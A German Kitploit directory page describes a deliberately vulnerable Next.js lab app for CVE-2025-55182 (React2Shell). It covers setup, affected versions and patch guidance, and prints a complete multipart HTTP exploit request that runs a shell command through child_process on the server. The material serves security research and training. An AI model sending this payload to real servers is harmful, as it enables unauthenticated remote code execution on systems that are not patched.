Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
NextJS-app-CVE-2025-55182 — Proof-of-concept Next.js-Anwendung, die CVE-2025-55182 (React2Shell) demonstriert, eine kritische RCE in React Server Components, mit Exploit-Beispiel und Mitigationshinweisen für die Sicherheitsforschung. | Kitploit
Tools/GitHubGitHub/s-mughal/nextjs-app-cve-2025-55182
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubs-mughal/nextjs-app-cve-2025-55182

NextJS-app-CVE-2025-55182

Proof-of-concept Next.js-Anwendung, die CVE-2025-55182 (React2Shell) demonstriert, eine kritische RCE in React Server Components, mit Exploit-Beispiel und Mitigationshinweisen für die Sicherheitsforschung.

Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Next.js CVE-2025-55182 Konzeptnachweis

Dies ist eine Next.js-Anwendung als Konzeptnachweis, die anfällig für CVE-2025-55182 (auch bekannt als „React2Shell") ist, eine kritische Schwachstelle für Remote Code Execution (RCE) in React Server Components.

⚠️ WARNUNG

Diese Anwendung ist absichtlich anfällig und sollte NUR verwendet werden für:

  • Sicherheitsforschung
  • Ausbildungszwecke
  • Tests in isolierten Umgebungen

NICHT:

  • In der Produktion bereitstellen
  • Unsicheren Netzwerken aussetzen
  • Mit sensiblen Daten verwenden

Schwachstellendetails

CVE-2025-55182 betrifft:

  • React-Versionen 19.0.0 bis 19.2.0
  • Next.js-Versionen 15.x und 16.x (mit App Router)
  • Anwendungen, die React Server Components (RSC) verwenden

Die Schwachstelle beruht auf unsicherer Deserialisierung in der Verarbeitung von React Server Component-Payloads, die es nicht authentifizierten Angreifern ermöglicht, über speziell gestaltete HTTP-Anfragen beliebigen Code auf dem Server auszuführen.

Setup-Anleitung

Option 1: Lokale Entwicklung

  • Abhängigkeiten installieren:

    root@kitploit:~
    npm install
    
  • Entwicklungsserver starten:

    root@kitploit:~
    npm run dev
    
  • Auf die Anwendung zugreifen: Öffnen Sie http://localhost:3000 in Ihrem Browser.

  • Option 2: Docker

    1. Docker-Image erstellen:

      root@kitploit:~
      docker build -t nextjs-cve-2025-55182 .
      
    2. Container ausführen:

      root@kitploit:~
      docker run --rm -p 3000:3000 nextjs-cve-2025-55182
      
    3. Auf die Anwendung zugreifen: Öffnen Sie http://localhost:3000 in Ihrem Browser.

    Anwendungsstruktur

    • Login-Seite (/): Ein einfaches Anmeldeformular mit React Server Components
    • Dashboard (/dashboard): Eine geschützte Seite, die nach der Anmeldung zugänglich ist

    Anfällige Komponenten

    Diese Anwendung verwendet:

    • Next.js 15.1.0 (anfällige Version)
    • React 19.0.0 (anfällige Version)
    • App Router mit React Server Components (RSC)
    • Grundlegende create-next-app-Struktur

    Die Schwachstelle existiert im Deserialisierungsmechanismus von RSC-Payloads, der ausgenutzt werden kann, indem bösartige Multipart-HTTP-Anfragen direkt an Seitenrouten gesendet werden (z. B. http://localhost:3000 oder http://localhost:3000/dashboard). Der Exploit funktioniert auf jeder Seite, die React Server Components verwendet.

    Ausnutzung

    Die Schwachstelle kann ausgenutzt werden, indem speziell gestaltete HTTP-Anfragen direkt an Seitenrouten gesendet werden (z. B. http://localhost:3000 oder http://localhost:3000/dashboard). Der Exploit funktioniert auf jeder Seite, die React Server Components verwendet.

    Kurzes Exploit-Beispiel

    root@kitploit:~
    POST / HTTP/1.1
    Host: localhost:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
    Next-Action: x
    X-Nextjs-Request-Id: b5dce965
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
    X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
    Content-Length: 740
    
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="0"
    
    {
      "then": "$1:__proto__:then",
      "status": "resolved_model",
      "reason": -1,
      "value": "{\"then\":\"$B1337\"}",
      "_response": {
        "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
        "_chunks": "$Q2",
        "_formData": {
          "get": "$1:constructor:constructor"
        }
      }
    }
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="1"
    
    "$@0"
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="2"
    
    []
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
    
    

    Der Exploit zielt direkt auf Seitenrouten ab – funktioniert auf localhost:3000 (Startseite) oder localhost:3000/dashboard (Dashboard-Seite).

    Abhilfe

    Um diese Schwachstelle zu beheben:

    • Aktualisieren Sie React auf Version 19.0.1, 19.1.2 oder 19.2.1+
    • Aktualisieren Sie Next.js auf eine gepatchte Version (15.0.5+ oder 16.x mit Patches)

    Referenzen

    • CVE-2025-55182
    • React-Sicherheitshinweis
    • Next.js-Sicherheitshinweis

    Lizenz

    Dieser Konzeptnachweis wird nur zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt.

    Tool herunterladen